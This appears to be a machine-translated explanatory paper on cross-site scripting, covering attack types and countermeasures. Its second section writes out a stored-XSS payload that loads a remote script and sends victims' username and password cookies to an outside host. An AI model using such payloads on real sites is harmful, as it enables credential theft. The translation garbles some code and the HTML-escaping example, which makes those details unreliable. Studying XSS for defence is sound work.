The principle of cross-site scripting Attack (XSS) and its preventive countermeasures

Source: Internet
Author: User
Tags html page regular expression

absrtact: with the rapid development of computer network technology, network security has become more and more people's attention, the form of network attacks are various, many worms, trojan viruses, such as implanted into some Web pages, to network users brought a great security risk. Where XSS cross-site scripting attacks, malicious attackers into the Web page to insert malicious HTML code, when users browse the page, embedded inside the Web HTML code will be executed, so as to achieve the special purpose of malicious attack users. This paper mainly expounds the mechanism and characteristics of XSS, analyzes the detection of Web page code and the characteristics of Trojan horse, and probes into some corresponding countermeasures for these characteristics.

keywords: Web trojan; XSS; attack; guard against

First, preface

Web Trojan is a new type of malicious code, some attackers put it into the server-side HTML page, through the client access to the server to propagate malicious attack code, it is mainly through the browser and some of the plug-in vulnerabilities to the implantation, Web Trojan is a kind of client attack way, It can effectively bypass the firewall detection, hidden in the client to the malicious code, the client without the knowledge of the malicious executable program to download and execute. Poses a serious security threat to internet users.

After Web 2.0 appeared, the harmfulness of XSS reached a very serious point. Cross-site Scripting the English name is (crosses site script) and is named XSS in order to differentiate it from cascading style sheets (cascading stylesheets, CSS). An XSS attack is an intruder that inserts malicious data into the HTML code of a remote Web page that the user believes is trustworthy, but when the browser downloads the page, the script embedded in it is interpreted and executed. XSS has its own unique characteristics, at present, many researchers at home and abroad around the defense of XSS in-depth discussion and research, while the attackers are also using some more advanced means to improve the Trojan horse attack concealment, to improve the success of Trojan Horse attack, therefore, The mechanism of XSS and the research of preventive countermeasures have become an important subject of computer workers.

second, the mechanism and characteristics of XSS

the genesis of 1.XSS

Cross-site Scripting XSS vulnerability is actually the problem of HTML injection, the attacker's input has not been strictly controlled into the database, the final display to the visiting users, resulting in the browser in the visiting user to browse the user's identity to execute the HTML code, the data flow is as follows: The attacker's HTML input- >web program, enter database->web program-user browser. At present, almost all of the sites are provided with an in-station or out-of-station information search box. In this search box, you can search for anything available on the site. This search form looks like this:


Figure 1-1

Figure 1-2

Internal code: <form action= "search.asp" method= "Get" >

<input type= "text" name= "Q" value= ""/>

<input type= "Submit" value= "Search"/>

</form>

The search results are displayed on the ASP Web page, and it also lists the search results in the keywords. On a Web page, no matter what the user searches for, it will show the search results on the Web page. Now if an attacker attempts to inject malicious script, such as in the search box, enter the following HTML code: "<script>alert (' XSS cross-site Scripting attack ') </script>" code will become <inputtype= "text "Name=" Q "value=" "<script>alert (' XSS cross-site Scripting attack ') </script>/> the embedded JavaScript code will be executed by the browser and a warning box will appear prompting" XSS Cross-site scripting attack ". The user search function cannot be completed. (The above two sites have done XSS filtering, can not see the warning box)

Here is an example of a user registration page, which is, of course, simple, almost impossible to attack any website, just to see how it works. We know that many websites provide user registration function, the site background database store user name, password, convenient user next login, some sites are directly logged in clear text user name, password, malicious user registered account after login using simple tools to view the cookie structure name, if the website has XSS vulnerability, Then it is easy to get the user name and password of other users.


Figure 2-1

The user registration page as shown in Figure 2-1. Allows the user to fill in the registration information and then store it in the background database. Because we fully trust the user input, the user registration information can be correctly entered into the database. However, some malicious users will use this vulnerability to enter HTML and JS code, such as <scripttype= "Text/javascript" src= "Http://www.123.com/h.js" ></script> This code is entered directly into the "User name" field to steal user information.

In the Http://www.123.com/h.js:

Varusername=cookiehelper.getcookie (' username '). value;

Varpassword=cookiehelper.getcookie (' password '). value;

Varscript =document.createelement (' script ');

Script.src= ' http://www.123.com/index.asp?username= ' +username+ ' &password= ' +password;

Document.body.appendChild (script);

This makes it easy to get the user name and password in the cookie.

2. Types of cross-site scripting attacks

2.1 Non-persistent cross-site scripting attacks, non-persistent XSS is also known as Reflection Cross-site vulnerability. It is the most common type of XSS. Here, the injected data is reflected to the attacker. The above example 1, is a non-persistent attack. A typical non-persistent XSS contains links to XSS.

2.2 Persistent cross-site scripting attacks (storage), persistent cross-site scripting is the storage of cross-site scripting. When it occurs, the XSS variable is stored in the database of the Web site whenever the user opens the Web page. Each time the user opens the browser, the script executes. Persistent XSS is more harmful than non-persistent XSS, because the script is executed automatically whenever a user opens a Web page for content to view. The above Example 2 is a persistent cross-site scripting attack.

2.3 Dom-based cross-site scripting attacks, Dom-based XSS is sometimes referred to as "TYPE-0XSS". When it occurs, the XSS variable executes the result of modifying the user's browser page by the DOM. The HTTP response on the client does not change, but the script executes in a malicious manner.

third, the prevention of XSS countermeasures

The mode of XSS attack is very simple, it is to embed their own code into the page, with the page piece execution, XSS attack prevention is also simple, for the Web site developers, the first should focus on all user submissions for reliable input validation. These submissions include HTML, URLs, query keywords, HTTP headers, post, get data, and so on. Accept only the characters you want, in the appropriate format, within the length you specify. block, filter or ignore anything else. The processing strategy differs for user input that appears in different locations.

1. HTML

Only need to deal with < >, as long as there is no HTML tag, the page is safe. You can use the ASP built-in method replace (str, "<", "<") Replace (str, ">", ">") to process the content to be output, <,>, and escape.

2, JS

The user input that will be output to the JS code snippet is not handled in a good way; escaping only a few characters does not guarantee that all attacks are removed. Therefore, it is generally recommended not to output user-generated content directly to the JS fragment.

If the condition is limited, the content must be output directly, there are the following methods to choose:

1) If the content to be output has a specific value returned or a specific format, it can be processed using a whitelist or regular expression.

2) content can be exported to HTML hidden tags or hidden forms, JS by obtaining the contents of the tag to get that content.

3. Check

So, how to check the existing pages. The answer to this question is that there is currently no good way to fully check out the server for possible XSS attacks on the page, there are some ways to check out the more obvious omissions, the basic idea is as follows:

1) Remove all unique requests from Apache Access_log and modify one of its parameters to "<script>alert (' XSS ') </script>" to initiate the request.

2) Gets the returned content, if the content is the same as the string, indicating that the suspicious input is not processed to output to the page, the page is hidden, and needs to be processed.

This way, you can check out the vast majority of XSS attacks that can be initiated through get requests. Those request parameters that are not present in the Access_log, which are not checked here, may be omitted, and need to be manually collated and tested. Requests made through post need to be checked with a different policy. The idea is as follows: all the forms that can be entered on the site, enter the character string, for example < ' ", if the page generated after the submission contains an unhandled this string, indicating a hidden danger.

Through the above analysis, we can see that XSS is a more harmful, more difficult to guard against, and more covert attack mode. In fact, as long as the understanding of its principles, coupled with the need to consider the prevention of countermeasures, you can eradicate XSS vulnerabilities.

Reference documents:

1. "Web Trojan Attack combat" electronic industry press, Ren Fei, Zhang Wei, Zhang Aihua/2009-05

2. For coding-based cross-site scripting attack analysis and Prevention methods, Zhang Wei, Wu Hao small microcomputer system,/2013 years. 3. Web Trojan mechanism and defense technology Zhang Huilin, GIANWI, Han Cenhui Software Journal/2013 4.

Http://wenku.baidu.com/view/d66b6c554431b90d6c85c7b3.html


Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.